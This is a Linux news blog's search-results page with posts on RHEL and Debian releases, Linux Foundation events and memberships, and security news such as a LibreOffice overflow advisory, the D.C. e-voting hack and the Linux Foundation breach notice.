Showing posts sorted by date for query Linux Foundation. Sort by relevance Show all posts
Showing posts sorted by date for query Linux Foundation. Sort by relevance Show all posts

Red Hat Inc Announced The General Availability Red Hat Enterprise Linux (RHEL) 6.5

Red Hat Inc Announced The General Availability Red Hat Enterprise Linux (RHEL) 6.5 

The RHEL 6x series get another important update as Red Hat Inc, the world's leading provider of open source solutions announced the general availability of Red Hat Enterprise Linux 6.5, the latest version of Red Hat Enterprise Linux 6. According to the official press release of Red Hat -RHEL 6.5 expands Red Hat’s vision of providing an enterprise platform that has the stability to free IT to take on major infrastructure challenges and the flexibility to handle future requirements, with an extensive partner and support ecosystem. 
Red Hat Enterprise Linux 6.5 is mainly designed for those who build and manage large, complex IT projects, especially enterprises that require an open hybrid cloud. From security and networking to virtualization, Red Hat Enterprise Linux 6.5 provides the capabilities needed to manage these environments, such as tools that aid in quickly tuning the system to run SAP applications based on published best practices from SAP.“Red Hat Enterprise Linux 6.5 provides the innovation expected from the industry’s leading enterprise Linux operating system while also delivering a mature platform for business operations, be it standardizing operating environments or supporting critical applications. The newest version of Red Hat Enterprise Linux 6 forms the building blocks of the entire Red Hat portfolio, including OpenShift and OpenStack, making it a perfect foundation for enterprises looking to explore the open hybrid cloud.”-said Jim Totton, vice president and general manager of Red Hat Inc. Now lets take a closer look to the main highlights of RHEL 6.5 : 

Securing the Next-Generation Enterprise
Red Hat Enterprise Linux 6.5 continues the push for integrated security functionality that combines ease-of-use and up-to-date security standards into the platform. The addition of a centralized certificate trust store enables standardized certificate access for security services. Also included are tools that meet leading security standards, including OpenSCAP 2.1, which implements the National Institute of Standards and Technology’s (NIST’s) Security Content Automation Protocol (SCAP) 1.2 standard. With these additions, Red Hat Enterprise Linux 6 provides a secure platform upon which to build mission-critical services and applications.

Networking – When Every (Micro)Second Matters
In the financial services and trading-related industries, application latency is measured in microseconds, not seconds. Now, the latest version of Red Hat Enterprise Linux 6 fully supports sub-microsecond clock accuracy over the local area network (LAN) using the Precision Time Protocol (PTP). Precision time synchronization is a key enabler for delivering better performance for high-speed, low latency applications. Red Hat Enterprise Linux 6.5 can now be used to track time on trading transactions, improving time stamp accuracy on archived data or precisely synchronizing time locally or globally. Thanks to other networking enhancements in Red Hat Enterprise Linux 6.5, system administrators now have a more comprehensive view of network activity. These new capabilities enable sysadmins to inspect IGMP (Internet Group Management Protocol) data to list multicast router ports, multicast groups with active subscribers and their associated interfaces, all of which are important to many modern networking scenarios, including streaming media.

Virtualization Enhancements
Red Hat Enterprise Linux 6.5 continues Red Hat’s commitment to improving the overall virtualization experience and includes several improvements that make it a compelling choice for running in virtualized environments. Sysadmins can now dynamically enable or disable virtual processors (vCPUs) in active guests, making it an ideal choice for elastic workloads. The handling of memory intensive applications as Red Hat Enterprise Linux guests has also been improved, with configurations supported for up to 4TB of memory on the Kernel-based Virtual Machine (KVM) hypervisor. The KVM hypervisor also integrates with GlusterFS volumes to provide direct access to the distributed storage platform, improving performance when accessing Red Hat Storage or GlusterFS volumes. Finally, guest drivers have been updated to improve performance of Red Hat Enterprise Linux 6.5 running as a guest on supported third-party hypervisors.

Evolving Ease-of-Use, Storage, and More
As application deployment options grow, portability becomes increasingly important. Red Hat Enterprise Linux 6.5 enables customers to deploy application images in containers created using Docker in their environment of choice: physical, virtual, or cloud. Docker is an open source project to package and run lightweight, self-sufficient containers; containers save developers time by eliminating integration and infrastructure design tasks. Red Hat Enterprise Linux 6.5 stays current with the advancements in Solid-State Drive (SSD) controller interface, introducing support for NVM Express (NVMe)-based SSDs. The NVMe specification aims to standardize the interface for PCIe-based SSDs and its inclusion in Red Hat Enterprise Linux 6.5 positions the platform to support an expanding range of future NVMe-based devices.

Improvements have also been added to improve enterprise storage scalability within Red Hat Enterprise Linux 6.5. It is now possible to configure more than 255 LUNs connected to a single iSCSI target. In addition, control and recovery from SAN for iSCSI and Fibre Channel has been enhanced, and updates to the kexec/kdump mechanism now make it possible to create debug (dump) files on systems configured with very large memory (e.g. 6TB).

Red Hat Enterprise Linux 6.5 makes it easier to track and manage subscription consumption across the enterprise, integrating subscription tracking into existing business workflow. Usability enhancements include support for remote access to Windows clients and servers that use a newer version of the RDP protocol, including Windows 7 and 8 desktops and Windows Server 2012

To Download Red Hat Enterprise Linux 6.5 Click Here


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Debian Linux 7.0 Code Named 'Wheezy' Released & Available For Download

Debian Linux 7.0 Code Named 'Wheezy' Released & Added  Multiarch Support, Several Specific Tools

Once it was one of the most popular Linux distribution which have drawn the maximum attention, yes you are right I am talking about none other than Debian Linux. Now a days the craze of this flavor has became little fade but as the foundation for other, more popular Linux distributions, such as Mint, Ubuntu and few Pen Testing Distro, still the value of Debian exist. So the up-gradation and new release of this Linux flavor is  still very much important. And today I will talk about the new release of Debian Linux version 7.0 code named 'Wheezy'. After many months of constant development, the developers at Debian project proudly announced the general availability of the next version of this major Linux which is Debian 7.0 aka 'Wheezy'. According to the release note This new version of Debian includes various interesting features such as multiarch support, several specific tools to deploy private clouds, an improved installer, and a complete set of multimedia codecs and front-ends which remove the need for third-party repositories. Multiarch support, one of the main release goals for Wheezy, will allow Debian users to install packages from multiple architectures on the same machine. This means that you can now, for the first time, install both 32- and 64-bit software on the same machine and have all the relevant dependencies correctly resolved, automatically. The installation process has been greatly improved: Debian can now be installed using software speech, above all by visually impaired people who do not use a Braille device. Thanks to the combined efforts of a huge number of translators, the installation system is available in 73 languages, and more than a dozen of them are available for speech synthesis too. In addition, for the first time, Debian supports installation and booting using UEFI for new 64-bit PCs (amd64), although there is no support for Secure Boot yet. 

This Release Includes Numerous Updated Software Packages, Such as:-
  • Apache 2.2.22
  • Asterisk 1.8.13.1
  • GIMP 2.8.2
  • An updated version of the GNOME desktop environment 3.4
  • GNU Compiler Collection 4.7.2
  • Icedove 10 (an unbranded version of Mozilla Thunderbird)
  • Iceweasel 10 (an unbranded version of Mozilla Firefox)
  • KDE Plasma Workspaces and KDE Applications 4.8.4
  • kFreeBSD kernel 8.3 and 9.0
  • LibreOffice 3.5.4
  • Linux 3.2
  • MySQL 5.5.30
  • Nagios 3.4.1
  • OpenJDK 6b27 and 7u3
  • Perl 5.14.2
  • PHP 5.4.4
  • PostgreSQL 9.1
  • Python 2.7.3 and 3.2.3
  • Samba 3.6.6
  • Tomcat 6.0.35 and 7.0.28
  • Xen Hypervisor 4.1.4
  • The Xfce 4.8 desktop environment
  • X.Org 7.7

Along with these more than other 36,000 ready-to-use software packages, built from nearly 17,500 source packages also included in Debian Linux 7.0. So after reading all those cool features, what you are waiting for lets download the installation image via bittorrent (the recommended method), jigdo, or HTTP






SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

LinuxCon & Embedded Linux Conference Europe 2012 Schedule Announced

LinuxCon & Embedded Linux Conference Europe 2012 Schedule Announced 

The Linux Foundation declared the schedule of for the second LinuxCon Europe event, which will take place from 5 to 7 November in Barcelona, in Hotel Fira Palace, has been posted on the conference's web site. LinuxCon Europe will bring together the best and brightest that the Linux community has to offer, including community developers, system administrators, business executives and operations experts. LinuxCon Europe will deliver attendees top notch speaking talent (from across Europe and around the globe), innovative and abundant program content, and a wide variety of opportunities to connect with peers. Keynote speakers include Canonical founder Mark Shuttleworth and Eucalyptus CEO MÃ¥rten Mickos. The conference will also feature a discussion of the latest technical advancements in the Linux kernel between Linus Torvalds and Intel's Chief of Linux and Open Source Technologies Dirk Hondel. Scheduled talks include Google's Theodore Ts'o speaking on "Optimizing File System Performance When Memory is Tight" and a talk by Intel developer Marcel Holtmann on new challenges for network support in embedded and consumer applications of Linux. Red Hat employee Ric Wheeler is heading a panel of developers from several SSD caching projects who will discuss how SSDs can be used in Linux as caches for more traditional storage media. Projects that are covered in the schedule include LibreOffice, OpenStack, oVirt, LXC, systemd and Qt. 
Also the schedule for the co-located Embedded Linux Conference Europe has also been posted by Linux Foundation. Last year Embedded Linux Conference Europe (ELCE) took place at October in Prague. 


-Source (The-H & Linux Foundation)






SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Twitter Joins The Linux Foundation as A Silver Member

Twitter Joins The Linux Foundation as A Silver Member

Social networking giant Twitter joined The Linux Foundation, the nonprofit organization while dedicated to accelerate the growth of Linux & open-source. In addition to Twitter, the Linux Foundation also announced that Inktank and Servergy have also become members. Twitter joined as a silver member, paying $15,000 for the privilege. The Linux Foundation announced Twitter’s membership today as it gears up for next week’s annual LinuxCon conference in San Diego. “Linux and its ability to be heavily tweaked is fundamental to our technology infrastructure,” said Chris Aniszczyk, manager of open source at Twitter, in a statement. “By joining The Linux Foundation, we can support an organization that is important to us and collaborate with a community that is advancing Linux as fast as we are improving Twitter.”
Twitter is a real-time information service on which people post ideas, comments and news in 140 characters or less. Twitter brings users closer to the topics, events and people they care most about around the world. Based in San Francisco, Twitter is available worldwide in 30 languages, with 140 million active users and 400 million Tweets per day. This volume of data puts high demands on real-time data processing and the pace of innovation at the company. Twitter is supported by tens of thousands of Linux machines, which allow the company to customize for its unique needs. Twitter is joining The Linux Foundation to support the mission of promoting, protecting and advancing Linux, the company said. Twitter’s Chris Aniszczyk will deliver a keynote at LinuxCon on Aug. 30 entitled “The OSS Behind a Tweet.” 
Google, Yahoo is another big Web company that is part of the foundation. One missing name is Facebook, but Zemlin hopes to get Mark Zuckerberg and team on board as well. "We would love to have them as a member," Zemlin said. "They do participate in our events around the Open Compute Project so that’s a good thing. Their business runs on Linux as well."


-Source (eWeek & ars technica)






SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

LibreOffice Addresses Multiple Heap-based Buffer Overflow Vulnerability (CVE-2012-2665)


LibreOffice Addresses Multiple Heap-based Buffer Overflow Vulnerability (CVE-2012-2665)

Just a few weeks after releasing the LibreOffice 3.5.5, The Document Foundation has confirmed that security holes in earlier versions of the open source LibreOffice, that could be exploited to execute arbitrary code with the privileges of the active user. According to the security advisories of LibreOffice, dubbed CVE-2012-2665 - "Multiple heap-based buffer overflow flaws were found in the XML manifest encryption tag parsing code of LibreOffice. An attacker could create a specially-crafted file in the Open Document Format for Office Applications (ODF) format which when opened could cause arbitrary code execution." Users are recommended to upgrade to 3.5.5 or 3.6.0 to avoid this flaw.  Red Hat released updated OpenOffice.org and LibreOffice packages for both Red Hat Enterprise Linux version 5 and Red Hat Enterprise Linux version 6. Users are advised to upgrade to these updated packages, which contain backported patches to correct the issues, Red Hat said in three security advisories published on Tuesday. Linux vendor Novell released updated LibreOffice packages for SUSE Linux Enterprise Desktop 10 and a LibreOffice update is also available for Ubuntu 12.04 (Precise Pangolin)






SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

"CloudOpen" Open-source Cloud Conference Will Be Hosted By Linux Foundation on August

"CloudOpen" Open-source Cloud Conference Will Be Hosted By Linux Foundation on August
The Linux Foundation announced that it would hold a symposium on the cloud, big data and open source this August in San Diego dubbed CloudOpen. Topics like Hadoop, Gluster, Chef and KVM -- in addition to Linux -- are to be on the menu, as the event aims to inform developers and IT operations personnel alike.
Amanda McPherson, vice president of marketing and developer services for the Linux Foundation, said that the free exchange of ideas is a crucial concern for the community.
"This conference is built on one belief: open works. We know this from experience and know that the cloud demands it in order to be successful for the long term. Because Linux, open-source software and collaborative development are the foundations of the cloud, it's important to provide a vendor-neutral forum where those who are committed to openness can advance this work and users and industry can learn about 'open' as it is related to the cloud," she stated.
The foundation also released a call for proposals, asking that submissions be made by June 1. While there were a couple of seemingly high-profile absences from the announcement -- both Canonical and VMware are nowhere to be found on the official statement -- Linux Foundation communications director Jennifer Cloer says the organization is in talks with both companies and that both are expected to participate in CloudOpen.
The announcement comes at a crucial time for VMware and Canonical, as the latter firm is planning to make waves of its own with the official release of Ubuntu 12.04 later this week and the former battles an increasingly clouded public perception in the open-source sector. The foundation has confirmed that Canonical will be a founding sponsor of CloudOpen



-Source (Network World)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Microsoft Gets Recognition Among Top 20 Linux Kernel Contributors

Microsoft Gets Recognition Among Top 20 Linux Kernel Contributors

The Linux Foundation announced the top Linux kernel development contributors, with Microsoft getting on the list for the first time. The top 10 contributors to the Linux kernel in this latest report include "Red Hat, Intel, Novell, IBM, Texas Instruments, Broadcom, Nokia, Samsung, Oracle and Google," according to the report. For the first time, Microsoft has made the list of the top 20 contributors to the Linux kernel. Microsoft placed at No. 17 among companies that have contributed the most toward developing the Linux OS's kernel. As the Linux Foundation's announcement pointed out, it represents quite a change from the time when Microsoft CEO Steve Ballmer called Linux "a cancer" is now working within the collaborative development model to support its virtualization efforts and its customers. Because Linux has reached a state of ubiquity, in which both the enterprise and mobile computing markets are relying on the operating system, Microsoft is clearly working to adapt. In other words, some might recall the old adage: "If you can't beat 'em, join 'em.". The foundation suggested that Microsoft is "clearly working to adapt" in a world where Linux is used across enterprise and mobile environments.
The foundation's latest report, "Linux Kernel Development: How Fast It is Going, Who is Doing It, What They are Doing and Who is Sponsoring It," covers work completed through the Linux kernel 3.2 release, with an emphasis on the releases made since the last update to this report in December 2010 (2.6.36 to 3.2). 

Since 2005, there have been more than 7,800 developers contributing to the Linux kernel, according to the announcement. The foundation also claimed that "75 percent" of Linux kernel developers get paid for doing it. The full report, "Linux Kernel Development: How Fast It is Going. To Download the full report click Here



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Washington D.C. Online Voting System Hacked in Less Than 48 hrs

Washington D.C. Online Voting System Hacked By Researchers Of Michigan University in Less Than 48 hrs
The security functions of a pilot project for online voting in Washington D.C. compromised. Researchers at the University of Michigan have reported that it took them only a short time to crack the security of the whole function. "Within 48 hours of the system going live, we had gained near complete control of the election server", the researchers wrote in a paper that has now been released. "We successfully changed every vote and revealed almost every secret ballot." - Said the researchers.
The hack was only discovered after about two business days – and most likely only because the intruders left a visible trail on purpose. In 2010, the developers of the municipal e-voting system that enables voters living abroad to vote via a web site, invited security experts to conduct tests. The university researchers say that the project was developed in cooperation with the Open Source Digital Voting Foundation (OSDV) and that other US states have also worked on services similar to Washington's "Digital Vote-by-Mail Service". They also praise the system's transparency as exemplary but point out that its architecture has fundamental security weaknesses and was not able to withstand a shell injection and other common hacker techniques. The security experts investigated common vulnerable points such as login fields, the virtual ballots' content and filenames, and session cookies – and found several exploitable weaknesses. Even the Linux kernel used in the project proved to have a well known vulnerability.

  



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Graphics Firm NVIDIA Joins The Linux Foundation

Graphics Firm NVIDIA Joins The Linux Foundation

The Linux Foundation has announced that amongst its latest addition of new members is graphics firm, NVIDIA, a move which is expected to strengthen the company's relationship within the Linux community. It has been hoped that from this membership, NVIDIA may partake in open-source driver projects, as currently NVIDIA only offers closed-source drivers for Linux, which typically adds complexity to integration and prevents the open-source community from efficiently contributing enhancements and bug-fixes.
On the other-hand, at the most basic level, NVIDIA may simply wish to reap the benefits of membership to support its increasing involvement in Linux-based operating systems such as Google Android, with the firm no doubt interested in the multimedia direction that Ubuntu appears to be heading in. In a brief statement, Nvidia said that its membership in the Linux Foundation will enable it to collaborate better with "the organizations and individuals instrumental in shaping the future of Linux, enabling a great experience for users and developers of Linux."



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Red Hat Enterprise Virtualization 3.0 (RHEV) Released


Red hat officially announced the global availability of Red Hat Enterprise Virtualization 3.0, with significantly expanded capabilities for both its server and desktop virtualization management tools and its Kernel-based Virtual Machine (KVM) hypervisor.  With Red Hat Enterprise Virtualization 3.0, Red Hat provides a compelling open virtualization alternative to customers that offers exceptional performance, scalability, security, manageability and cost benefits.

Red Hat Enterprise Virtualization for Servers was initially released in November 2009, followed by the release of Red Hat Enterprise Virtualization for Desktops in mid 2010.  Since its debut, the Red Hat Enterprise Virtualization product portfolio has enjoyed growing customer adoption and an expanding partner ecosystem.  Customers have expressed that they are looking for an alternative to proprietary solutions and are deploying Red Hat Enterprise Virtualization in mission-critical production deployments.  In addition, approximately 50 percent of Red Hat’s largest customers, based on revenue, have begun deploying or piloting Red Hat Enterprise Virtualization.1 Many are recognizing and executing on the trend of deploying dual-source virtualization strategies, with over 80 percent of Red Hat Enterprise Virtualization customers deploying Red Hat Enterprise Virtualization as an alternative side-by-side with VMware2.
Open virtualization has achieved increased visibility in recent months through the Open Virtualization Alliance and oVirt project.  As a founding member of the Open Virtualization Alliance, Red Hat has worked closely with leading IT vendors across the industry to foster the adoption of KVM-based solutions, ensuring that customers can choose from a wide range of virtualization products and services. Additionally, Red Hat is a lead sponsor of the industry-backed open source oVirt project, which has the goal of promoting the development of open source virtualization management technologies.
Red Hat Enterprise Virtualization 3.0 brings a balance of new enterprise virtualization management features, performance and scalability for both Linux and Windows workloads, at a lower cost than proprietary alternatives.3  With its open source hypervisor and virtualization management system, Red Hat Enterprise Virtualization offers an interoperable solution without lock-in to proprietary platforms.  Red Hat has established itself as an industry leader in virtualization performance, holding all of the top five current SPECvirt_sc2010 results (www.spec.org), including the best 2-socket, 4-socket and 8-socket results.  Similarly, Red Hat Enterprise Virtualization leads the industry in scalability metrics for VM density and hosts per cluster.  These leading performance and scalability benefits also come at prices one third to one fifth of the cost of alternative proprietary offerings.4
With Red Hat Enterprise Virtualization 3.0, the management system is now a Java application running on JBoss Enterprise Application Platform on Red Hat Enterprise Linux. It provides over 1,000 new features, enhancements and improvements, such as a power user portal for self-service provisioning, RESTful API, local storage and more. Offering a reliable and versatile foundation for cloud platforms, Red Hat Enterprise Virtualization 3.0 is designed to meet the heavy demands of the cloud and create a secure, scalable environment for sharing resources and for managing them simply and flexibly.

For more information about Red Hat Enterprise Virtualization 3.0, including a full list of new features and capabilities, or to download a free, fully supported 60-day trial of Red Hat Enterprise Virtualization 3.0 Click Here



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Red Hat Enterprise Linux (RHEL) 6.2 Released



After RHEL 6.2 Beta now Red Hat the world’s leading provider of open source solutions, today announced the general availability of Red Hat Enterprise Linux 6.2. With this milestone, Red Hat includes many enhancements that deliver benefits spanning multiple areas, including performance and scalability. Red Hat Enterprise Linux 6 operating system achieved the largest multi-core Linux configuration results certified to-date on the two-tier SAP® Sales and Distribution (SD) standard application benchmark.1 Proven to perform and scale, Red Hat Enterprise Linux 6 effectively supports large, mission-critical enterprise computing environments.
Vice President and General Manager, Platform Business Unit at Red Hat, said, “The exciting features in Red Hat Enterprise Linux 6.2 with new impressive SAP® benchmark results allow our enterprise customers to have increased confidence that Red Hat Enterprise Linux 6 can run their enterprise workloads with high performance across physical, virtual and cloud computing environments.”
Enterprises can confidently migrate to the latest multi-core technology with Red Hat Enterprise Linux 6. On the latest two-tier SAP SD standard application benchmark, Red Hat Enterprise Linux 6 achieved more than 22,000 SAP SD benchmark users on a single system. On this same benchmark, the HP DL980 G7 system running Red Hat Enterprise Linux 6 fully utilized all 80 cores and 160 threads in the 8-processor system running MaxDB 7.8 and the SAP enhancement package 4 for the SAP ERP 6.0 application. This is the largest Linux result submitted to SAP to-date. The results demonstrate the capabilities of the HP ProLiant DL980 G7 8-processor system’s PREMA architecture and smart CPU caching technology. Results are as of December 2, 2011, certification number 2011052.
“Clients need solutions to automate, scale-up or virtualize their environments to best fit their business requirements,” said Martin Whittaker, vice president, Systems and Solutions Engineering, Enterprise Servers, Storage and Networking at HP. “Optimizing Red Hat Enterprise Linux on HP ProLiant DL980 systems extends the power of open source to HP Converged Infrastructure, delivering uptime, increased capacity and faster processing speeds.”
Red Hat Enterprise Linux 6.2 delivers significant improvements in resource management and high availability, as well as new features aimed at storage and file system performance and identity management. Red Hat Enterprise Linux 6.2 provides additional capabilities to manage system resources. For service providers or internal IT organizations that deliver applications or hosted services via multi-tenant environments, maximums can be set for CPU time associated with a given application, business process or a virtual machine. This allows for more efficient management of SLAs and enables the ability to implement service priorities, similar to those associated with network Quality of Service (QoS).

When an enterprise deploys its applications to run in a Red Hat Enterprise Linux 6.2 guest hosted by VMware, the applications can now be utilized for High Availability (HA) Add-Ons. This also includes full support for use of GFS2 shared storage file system by the virtual machines. The result is additional deployment flexibility for customers requiring HA within a portion of their virtualized environment, as well as full support for Red Hat Enterprise Linux on the VMware hypervisor.

Red Hat Enterprise Linux 6.2 adds enhancements to storage and file system features including full support of iSCSI extension for RDMA. Now, benefits of low latency and high throughput through a standard SAN implementation based on 10Gb Ethernet are available to even the most demanding storage environments. This allows customers to opt out of expensive Infiniband hardware or other dedicated interconnect fabrics. Other enhancements around file system include delayed meta data logging, asynchronous and parallel file system writes, as well as support for multiple active instances of Samba in a cluster which improves overall throughput and increases availability for large Samba clustered deployments.

Identity Management:-
In Red Hat Enterprise Linux 6.2 provides the administrative tools to quickly install, configure and manage server authentication and authorization in Linux/Unix enterprise environments, while still providing the option to interoperate with Microsoft Active Directory. This enables enterprises to manage Linux infrastructure easily and cost-effectively. Centralized identity management and host-based access control can reduce administrative overhead, streamlines provisioning and improves security.

Performance:- 
Is key to all customers. Red Hat Enterprise Linux 6.2 continues to put an emphasis on accelerating I/O such as network traffic steering to improve network throughput by as much as 30 percent in performance tests conducted by Red Hat and delivering numerous file system enhancements that reduce read-write times and boost overall system utilization.

Red Hat expects to deliver the beta for Red Hat Enterprise Linux 5.8 later this month. Also fully underway is development for Red Hat Enterprise Linux 7, the next major release of Red Hat Enterprise Linux. Red Hat received an outstanding response from all Red Hat subscribers – users and partners – for requested features coming from the recent Red Hat Enterprise Linux 7 Ideas discussion group posted on the Red Hat customer portal. This important feedback allows Red Hat to continue to make Red Hat Enterprise Linux a computing foundation for the next generation of operating system platforms.

For More Information, New Technical Features and Benefits document Click Here



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Linux 101 Hacks By Ramesh Natarajan


The 2nd edition of Linux 101 Hack has been released. Its a freely available eBook Written by Ramesh Natarajan . There are total of 101 hacks in this book that will help you build a strong foundation in Linux. All the hacks in this book are explained with appropriate Linux command examples that are easy to follow. In the 2nd edition of the book, several small hacks from the 1st edition are consolidated, and several new hacks were added. This free eBook contains 12 chapters with total of 271 pages. 

The Chapter Contents:-

  • Powerful CD Command Hacks
  • Essential Linux Commands
  • SSH Commands and Tips
  • Date Manipulation
  • PS1, PS2, PS3, PS4 and PROMPT_COMMAND
  • Archive and Compression
  • Command Line History
  • System Administration Tasks
  • Install Packages
  • LAMP Stack
  • Bash Scripting
  • System Monitoring and Performance

For More information and to download the Linux 101 Hack eBook Click Here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Fedora Project Forces Users to Change Password & ssh Key


The Fedora Project has posted an announcement advising current users of the Fedora Account System to change their password and SSH public key before 30 November or risk their accounts being marked as inactive. The information was posted to the Fedora "announce" mailing list by Infrastructure Lead Kevin Fenzi, who stated that the change was "due to the large number of high profile sites with security breaches in recent months". Recently reported breaches include those of WineHQ, The Linux Foundation and kernel.org. The new move is precautionary, and is not due to any "specific compromise or vulnerability in Fedora Infrastructure".
The request sets out the requirement for passwords of at least 9 characters in length (20 if only lowercase characters are used) and notes that a new SSH public key must also be generated to avoid an account being marked as inactive. The announcement also includes a "Do's and Don'ts" section with several tips for increasing personal security. Instructions for changing Fedora Account System passwords and SSH public keys can be found in the Q&A section of the announcement.
According to Fedora:-
"All existing users of the Fedora Account System (FAS) at https://admin.fedoraproject.org/accounts are required to change their password and upload a NEW ssh public key before 2011-11-30. Failure to do so may result in your account being marked inactive. Passwords changed and NEW ssh public keys uploaded after 2011-10-10 will meet this requirement.

Backgound and Reasoning:-

This change event has NOT been triggered by any specific compromise or  vulnerability in Fedora Infrastructure. Rather, we believe, due to the large number of high profile sites with security breaches in recent months, that this is a great time for all Fedora contributors and users to review their security settings and move to "best practices" on their machines. Additionally, we are putting in place new rules for passwords to make them harder to guess.

New Password Rules:-

  • Nine or more characters with lower and upper case letters, digits and punctuation marks.
  • Ten or more characters with lower and upper case letters and digits.
  • Twelve or more characters with lower case letters and digits
  • Twenty or more characters with all lower case letters.
  • No maximum length.
Some Do's and Don'ts:-
  • NEVER store your ssh private key on a shared or public system.
  • ALWAYS use a strong passphrase on your ssh key.
  • If you must store passwords, use an application specifically for this purpose like revelation, gnome-keyring, seahorse, or keepassx.
  • Regularly apply your operating system's security related updates.
  • Only use ssh agent forwarding when needed ( .ssh/config: "ForwardAgent no")
  • DO verify ssh host keys via dnssec protected dns. ( .ssh/config:"VerifyHostKeyDNS yes")
  • DO consider a seperate ssh key for Fedora Infrastructure.
  • Work with and use security features like SELinux and iptables.
  • Review the Community Standard Infrastructure security document 


-News Source (Fedora Project & The H)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

First Ever Automotive Linux Summit (ALS 2011, Japan on November 28, 2011) By The Linux Foundation


The Linux Foundation announced today the first ever Automotive Linux Summit. Taking place in Japan on November 28, 2011, it will be an opportunity to address the growing need for carmakers and Linux developers to collaborate on the future of cars as devices. Nissan and Toyota will both be there, along with Intel, NEC, and a host of other mobile solutions developers.
Dig it: “cars as devices”. The Internet of Things will be upon us sooner than we imagined. Automobiles are becoming increasingly complicated, with computers and computer systems getting more and more integrated into the whole of the vehicle, not to mention connectivity being expected by the driver at the dashboard. No single vendor can provide the breadth of experience required to develop and maintain the kind of software necessary to power all the computing on a car, so the vendor-neutral approach of the Linux stack makes tremendous sense to car makers.
According to Linux Foundation:-
"Automotive Linux Summit (ALS) is event specifically for the automotive industry and the growing cross-industry ecosystem for future mobility solutions.
The Automotive Linux Summit is the premier vendor-neutral business and technical conference for companies and developers using or looking to use Linux and open-source technologies in automotive applications ranging from in-vehicle on-board system to cloud solutions for vehicle-to-vehicle and vehicle-to-infrastructure communications.
ALS is the event where automotive expertise meets open-source excellence talking and collaborating on solutions meeting the challenges of tomorrow's vehicular applications, traffic and mobility management solutions. For those who are developing embedded and/or infrastructure systems for the automotive industry and looking how they can leverage the power and flexibility of Linux and open-source to jump-start their product development ALS will be the one-stop source for business-oriented, technical and legal information.
Ultimately, ALS will bring together the key players and industry excellence to create a momentum for new opportunities through open innovation."

For more information and to do registration Click Here


-News Source (Linux Foundation)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Embedded Linux Conference Europe (ELCE)

The Linux Foundation and CE Linux Forum announced a schedule for the Embedded Linux Conference Europe (ELCE), set to take place Oct. 26-28 in Prague. Co-located with LinuxCon Europe, ELCE 2011 offers 50 presentations on Linux and Android -- including projects such as Genivi, Yocto, Linaro, and possibly Tizen -- plus speakers ranging from Linus Torvalds to Intel's Dirk Hohndel.
This year's Embedded Linux Conference Europe conference is the second ELCE event since the CE Linux Forum (CELF) forum merged into the Linux Foundation (LF) as a working group in Oct. 2010. (The first post-LF event occurred the same week the merger was announced last October in Cambridge, U.K.)  CELF also sponsors the U.S. ELC show, which this year was held in April in San Francisco. Merging with the LF brings some benefits to CELF's conference attendees, in that ELC/ELCE registrations also provide free passes to co-located LF conferences. In Prague, for example, ELCE attendees can also attend the world debut of LinuxCon Europe, which will be held at the same venue during the same three-day Oct. 26-28 period. A GStreamer conference is also co-located with the events.
ELCE will start off Oct. 26 with an address from LF Executive Director Jim Zemlin, who will "imagine a world without Linux." This will be followed by a Kernel Developer Panel that features a star-studded cast including Linux creator Linus Torvalds (pictured at right), real-time Linux pioneer Thomas Gleixner, Intel's Alan Cox, and IBM's Paul McKenney. The Oct. 27 keynotes, meanwhile, include Ixonos President of Global Solutions Antti Aumo discussing the "Cloud Phone," which may or may not refer to his company's announced support for the HTML5-focused Tizen spin-off of MeeGo and LiMo. Aumo's address will be followed by Intel Chief Linux and Open Source Technologist Dirk Hondel (pictured at left) offering a "Reflection on 20 years of Linux." Perhaps Dirk, too, can help the somewhat skeptical Linux community understand how Tizen will do any better than MeeGo and LiMo.

Further information:-
The Embedded Linux Conference Europe (ELCE) will be held October 26-28, Clarion Congress Hotel, in Prague, Czech Republic. Combined registration for ELCE and the collocated LinuxCon Europe, costs $550, with discounts available for students and "hobbyists."

Registration specifics may be found on this ELCE Europe registration page.
More general information and session details may be found on the ELCE Europe site.


-News Source (ELCE, Linux Foundation)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Security Breach on The Linux Foundation, Linux.com & their Subdomains


Dig a the history and go back into the previous week I hope you can surely remember  the attack on Linuxkernel.org. Now The Linux foundation is under cyber attack. the Linux Foundation has pulled its websites from the web to clean up from a “security breach.”
A notice posted on the Linux Foundation said the entire infrastructure including LinuxFoundation.org, Linux.com, and their sub domains are down for maintenance due to a security breach that was discovered on September 8, 2011.
“The LinuxFoundation made this decision in the interest of extreme caution and security best practices. We believe this breach was connected to the intrusion on kernel.org,” the group said.


Official Notice By The Linux Foundation is posted on their website and that is:- 

"Linux Foundation infrastructure including LinuxFoundation.org, Linux.com, and their subdomains are down for maintenance due to a security breach that was discovered on September 8, 2011. The Linux Foundation made this decision in the interest of extreme caution and security best practices. We believe this breach was connected to the intrusion on kernel.org.
We are in the process of restoring services in a secure manner as quickly as possible. As with any intrusion and as a matter of caution, you should consider the passwords and SSH keys that you have used on these sites compromised. If you have reused these passwords on other sites, please change them immediately. We are currently auditing all systems and will update this statement when we have more information.
We apologize for the inconvenience. We are taking this matter seriously and appreciate your patience. The Linux Foundation infrastructure houses a variety of services and programs including Linux.com, Open Printing, Linux Mark, Linux Foundation events and others, but does not include the Linux kernel or its code repositories.
Please contact us at info@linuxfoundation.org with questions about this matter."

For More Information Click Here


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Apache 2.2.20 Released (DDoS Vulnerability Fixed)


